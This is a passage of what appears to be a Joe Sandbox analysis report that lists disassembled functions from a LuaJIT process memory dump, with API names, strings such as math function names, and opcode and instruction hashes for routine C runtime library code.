                                                                                                                                                                        • Opcode Fuzzy Hash: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                                                                                                                                        • Instruction Fuzzy Hash: EB51D93390A60296E764AF24E0447BCF7A0FB05B18F941937C61A42295CF7AF485F729
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0B120 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: e+000$gfff
                                                                                                                                                                        • API String ID: 3215553584-3030954782
                                                                                                                                                                        • Opcode ID: 8e8504798e3096c9a346657a07f11e9947318bd45ce01f9eb4292907c059508d
                                                                                                                                                                        • Instruction ID: 5546bdf4d42cf1aaf481a6c8e5f2deb4c51dd1eb00fa810bc668c9fd5a0c8731
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e8504798e3096c9a346657a07f11e9947318bd45ce01f9eb4292907c059508d
                                                                                                                                                                        • Instruction Fuzzy Hash: EE5137A3B186C656E7249F25984076DEB91EB80B94F888231C7A847BD5CF3EE044D716
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B00BD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _handle_error
                                                                                                                                                                        • String ID: !$fmod
                                                                                                                                                                        • API String ID: 1757819995-3213614193
                                                                                                                                                                        • Opcode ID: f0718bf514110123fd14397416006eaade00b89320632af20748014d40c22490
                                                                                                                                                                        • Instruction ID: 2cc7d87770c839878763ab735def0352bdae01b8be61180d0cda9dcc8185733f
                                                                                                                                                                        • Opcode Fuzzy Hash: f0718bf514110123fd14397416006eaade00b89320632af20748014d40c22490
                                                                                                                                                                        • Instruction Fuzzy Hash: 4851EB53D2DBCB99E16367319011BB5EA98AF623C0F809332ED5D355A1DF3E6003621A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AB8050 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::rsfun
                                                                                                                                                                        • String ID: $$type parameter
                                                                                                                                                                        • API String ID: 3764944385-1705267328
                                                                                                                                                                        • Opcode ID: 6b1de1a4cd9c0b01c76d9f2ae974172aeab0731a05d1d1179e6173c14350cda6
                                                                                                                                                                        • Instruction ID: 2205bc6b185030c5fec3cf71058c9e8f2bdb5551c46cba48f1cd835f1ca79d7f
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b1de1a4cd9c0b01c76d9f2ae974172aeab0731a05d1d1179e6173c14350cda6
                                                                                                                                                                        • Instruction Fuzzy Hash: 9F513B37619B8586DB60DF4AE48022EF7A0F7C8BA4F544622EE9D877A4CF7DD4409B04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0CB88 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                        • String ID: U
                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                        • Opcode ID: bb5670a805d3fe430e447df02031e4798067a628be05abd275a1d0ed77e9e78f
                                                                                                                                                                        • Instruction ID: d6d1d784e252a5e4fb849e791c06414145199b6faff10d87ea68403a0c52faea
                                                                                                                                                                        • Opcode Fuzzy Hash: bb5670a805d3fe430e447df02031e4798067a628be05abd275a1d0ed77e9e78f
                                                                                                                                                                        • Instruction Fuzzy Hash: 7041F063B18A8292DB20EF25E4547AAE7A0FB887C0F844031EE4D87798DF3DD405D766
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0EE00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _handle_error
                                                                                                                                                                        • String ID: "$pow
                                                                                                                                                                        • API String ID: 1757819995-713443511
                                                                                                                                                                        • Opcode ID: a0dc12af340543ad661d9082fe21a51273c15c51973181b3e1556972bb2ad2fd
                                                                                                                                                                        • Instruction ID: c0394b19fccd47fd856fc83e10b608f9496c05e082fb63f67ff091526a43bf3f
                                                                                                                                                                        • Opcode Fuzzy Hash: a0dc12af340543ad661d9082fe21a51273c15c51973181b3e1556972bb2ad2fd
                                                                                                                                                                        • Instruction Fuzzy Hash: 492186B3D1CAC597E770DF10E040A6BF6A0FBDA344F501325F29906A94CB7DD0419B16
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B102B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_errno_from_matherr
                                                                                                                                                                        • String ID: tanh
                                                                                                                                                                        • API String ID: 1187470696-874243715
                                                                                                                                                                        • Opcode ID: 0a0cb5a22677a767c1ff2a638b69de59b972d8315788a6de307129cec1c6edf7
                                                                                                                                                                        • Instruction ID: 09969b8aebeefa73455f94ec973b4bd6b0bfc5e63f7b3cb01410368645ed70d9
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a0cb5a22677a767c1ff2a638b69de59b972d8315788a6de307129cec1c6edf7
                                                                                                                                                                        • Instruction Fuzzy Hash: 54215C77A186829BD7A0EF29E08026EF2E1FB88700F900135F68D86B56DF3DD4019F15
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B095DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CompareStringtry_get_function
                                                                                                                                                                        • String ID: CompareStringEx
                                                                                                                                                                        • API String ID: 3328479835-2590796910
                                                                                                                                                                        • Opcode ID: fb1c890ddb2a055798cdd89143855e7e553432db2242e5b9771681bd799df73e
                                                                                                                                                                        • Instruction ID: d6b074af8d0188e450a80f544bf8275773019d58e52f9b67d266ff28a664b077
                                                                                                                                                                        • Opcode Fuzzy Hash: fb1c890ddb2a055798cdd89143855e7e553432db2242e5b9771681bd799df73e
                                                                                                                                                                        • Instruction Fuzzy Hash: 61114772A0CBC296D760DB16B4406AAF7A0FB88B80F444136EE8D83B19CF3DD0508B49
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0987C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DateFormattry_get_function
                                                                                                                                                                        • String ID: GetDateFormatEx
                                                                                                                                                                        • API String ID: 595753042-159735388
                                                                                                                                                                        • Opcode ID: 29593a2998ac6117987e235cc15544d86eb18b79bbb5ee2f6b1f970d14c06510
                                                                                                                                                                        • Instruction ID: 0b2ce4d1ab21dc23947cfa96f80bcbae477971cf5c28d607ccabc362595aa327
                                                                                                                                                                        • Opcode Fuzzy Hash: 29593a2998ac6117987e235cc15544d86eb18b79bbb5ee2f6b1f970d14c06510
                                                                                                                                                                        • Instruction Fuzzy Hash: 95119072A08B86D6E610DF55B44009AF7A0FB88BC0F544136EE8D83B68CF3CD5148B45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B099B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44timeCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FormatTimetry_get_function
                                                                                                                                                                        • String ID: GetTimeFormatEx
                                                                                                                                                                        • API String ID: 3261793192-1692793031
                                                                                                                                                                        • Opcode ID: f2f3869fae40a697dfa15aca27d9aab4d31875b04a768175c03f66cbb9b00a22
                                                                                                                                                                        • Instruction ID: 0900c325e5fc9c8faea9ad75179d99f4275007e7597b3dbb942fb610c6595e3d
                                                                                                                                                                        • Opcode Fuzzy Hash: f2f3869fae40a697dfa15aca27d9aab4d31875b04a768175c03f66cbb9b00a22
                                                                                                                                                                        • Instruction Fuzzy Hash: 32119E72A08B86D6E710DF56B4000AAF7A0FB88BC0F984136EE9D43B69CF3DD5508B55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B05A30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _handle_error
                                                                                                                                                                        • String ID: !$sqrt
                                                                                                                                                                        • API String ID: 1757819995-799759792
                                                                                                                                                                        • Opcode ID: 3f9dd20109ce663b1f944da5101627329bdddfc87ab4d9b7372b39309db0ff23
                                                                                                                                                                        • Instruction ID: 05f30937254e711ddda18e30e1b87160bedf44d564aeb0f5be2a0d17d16c9244
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f9dd20109ce663b1f944da5101627329bdddfc87ab4d9b7372b39309db0ff23
                                                                                                                                                                        • Instruction Fuzzy Hash: A411B9B3D18B8692DA01DF15944072AE661BB9A7E0F508320E97C16AD8DF3DE0419A05
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AE14A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                        • String ID: csm
                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                        • Opcode ID: a34883132ee60a7a0e3e92ecfa04519025266e22849bdfec6dc3f932667f2681
                                                                                                                                                                        • Instruction ID: 0dbe0a30f8a034ec49efc3ec32845e1c3a72226ed548013060ce051c723f8b51
                                                                                                                                                                        • Opcode Fuzzy Hash: a34883132ee60a7a0e3e92ecfa04519025266e22849bdfec6dc3f932667f2681
                                                                                                                                                                        • Instruction Fuzzy Hash: 8A116A32A09B8592EB609F15E400269F7A0FB88B95F984631EE8D07B68DF3DE451CB14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0F010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _handle_error
                                                                                                                                                                        • String ID: "$exp
                                                                                                                                                                        • API String ID: 1757819995-2878093337
                                                                                                                                                                        • Opcode ID: 9fdd603b76a48d23854c83fa128c3ec0a1d065c38e77db87c8ff278af7f6c3ee
                                                                                                                                                                        • Instruction ID: 310e555b29e6c76c2fe56fb433b34c4ae32efa187e65aae3e366e73d9a3e70d1
                                                                                                                                                                        • Opcode Fuzzy Hash: 9fdd603b76a48d23854c83fa128c3ec0a1d065c38e77db87c8ff278af7f6c3ee
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C01C877A28B8997E620DF24D0496AAF7A0FFEA744F601315E74416770DB7ED0819B01
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A788E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFormatLastMessage_free_nolock
                                                                                                                                                                        • String ID: system error %d
                                                                                                                                                                        • API String ID: 3491801694-1688351658
                                                                                                                                                                        • Opcode ID: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
                                                                                                                                                                        • Instruction ID: 5030805a00f05d086ce4e05800c671321093543863cb050225259dd93e47edc6
                                                                                                                                                                        • Opcode Fuzzy Hash: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
                                                                                                                                                                        • Instruction Fuzzy Hash: 66015233A18AC3D2E760EB51F45176AF3A0FB84784F804035E68D47A59DF7EE4089B19
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B09A64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DefaultUsertry_get_function
                                                                                                                                                                        • String ID: GetUserDefaultLocaleName
                                                                                                                                                                        • API String ID: 3217810228-151340334
